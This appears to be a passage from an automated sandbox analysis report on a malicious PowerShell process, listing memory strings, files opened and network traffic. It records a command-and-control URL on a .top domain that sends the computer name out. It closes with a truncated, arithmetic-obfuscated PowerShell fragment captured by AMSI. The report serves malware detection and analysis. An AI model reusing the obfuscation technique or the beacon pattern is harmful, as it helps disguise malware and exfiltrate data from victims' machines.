Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.663085801790.0000021A36A40000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdberShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.663052507532.0000021A1C998000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdbllj= source: powershell.exe, 00000002.00000002.663090567187.0000021A3709E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.663088206745.0000021A36E04000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: utomation.pdbdb source: powershell.exe, 00000002.00000002.663088206745.0000021A36D60000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdbh source: powershell.exe, 00000002.00000002.663052507532.0000021A1C998000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: scorlib.pdba-k[ source: powershell.exe, 00000002.00000002.663088206745.0000021A36D60000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: powershell.exe, 00000002.00000002.663089995476.0000021A36E5C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: powershell.exe, 00000002.00000002.663089995476.0000021A36E5C000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: *on.pdbdw source: powershell.exe, 00000002.00000002.663085801790.0000021A36ABE000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=R06Okk43pnG38XsvEyzgB83qthqG2UUmOxWqGdorYa9lglds2TA-1tpHAbBY52hGQ_9c6KFN-ZAJv6x-gG9kxwmZdrrPUluwxFNVgQTU8AlsMoc6ZxZc6GUGZWuFdDktmRPCtVfvWJBDQQpI_30dcxrBY1jy-RZBTDGbohYWF3ugPnE4XhJjBb9V4AAR2ekGbbVS |
Source: global traffic | HTTP traffic detected: GET /mes6v8wj5phtr.php?id=computer&key=28342894733&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cmacnnkfbhlcncm.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=R06Okk43pnG38XsvEyzgB83qthqG2UUmOxWqGdorYa9lglds2TA-1tpHAbBY52hGQ_9c6KFN-ZAJv6x-gG9kxwmZdrrPUluwxFNVgQTU8AlsMoc6ZxZc6GUGZWuFdDktmRPCtVfvWJBDQQpI_30dcxrBY1jy-RZBTDGbohYWF3ugPnE4XhJjBb9V4AAR2ekGbbVS |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F9F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1FB96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1FA66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$o91mkbr7ed3vtf6/$32nxepuvb0gay75.php? |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$o91mkbr7ed3vtf6/$32nxepuvb0gay75.php?id=$env:computername&key=$xcdjnwvua&s=527 |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F7D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F7D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527 |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F7D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527p |
Source: powershell.exe, 00000002.00000002.663085801790.0000021A36ABE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000002.00000002.663085801790.0000021A36A8E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000002.00000002.663087374251.0000021A36BB0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic |
Source: powershell.exe, 00000002.00000002.663088206745.0000021A36D26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoO |
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2EAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1E931000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000002.00000002.663090479972.0000021A37020000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0 |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F877000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F862000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1FA66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F877000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F862000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvV |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1E931000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F862000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1EB5B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000002.00000002.663075653155.0000021A2EAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663075653155.0000021A2E9A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.663053799764.0000021A1F858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F877000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.663053799764.0000021A1F889000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:304:WilStaging_02 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ygi8e15xtdl6k2c.((-join (@((6829-6762),(86691/(5492-(13082447/2777))),(-4549+4661),(877855/(3417+(5722458/1491))),(-3224+3308),(-5216+5327))| ForEach-Object { [char]$_ })))( $fxb4tonc1di39mu ) $ygi8e15xtdl6k2c.(([system.String]::new(@((219023/(21722505/6645)),(891540/8255),(-6561+(64424832/(21774280/2255))),(-5726+5841),(4886-(8169-3384))))))()$5teju2orbwapdgq.(([char[]]@((7253-(11996-(12431-(59001782/7742)))),(-5740+(11936-(5419+(1103850/1650)))),(594849/(-3209+8568)),(-1852+(10186-(10384-2165))),(2284-2183)) -join ''))()[byte[]] $anxc5tg2wm9u86b = $fxb4tonc1di39mu.(([char[]]@((-6992+7076),(-141+(167328/(1171296/1764))),(-3238+(-1990+(52125464/(10090-242)))),(384408/3372),(838698/(-1153+(14176-5666))),(864561/8913),(-7252+(288+7085))) -join ''))() $atq3ip6evlnohyk=$anxc5tg2wm9u86b return $atq3ip6evlnohyk}[System.Text.Encoding]::ascii.(([char[]]@((335049/(7727-(10627264/3533))),(-7915+8016),(-10011+10127),(335-252),(-5939+(1234+4821)),(466-(2345376/6663)),(7803-7698),(174130/1583),(-4207+4310)) -join ''))((hz1cnubfqdw7jvkyo3gs6xi5m0e "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 |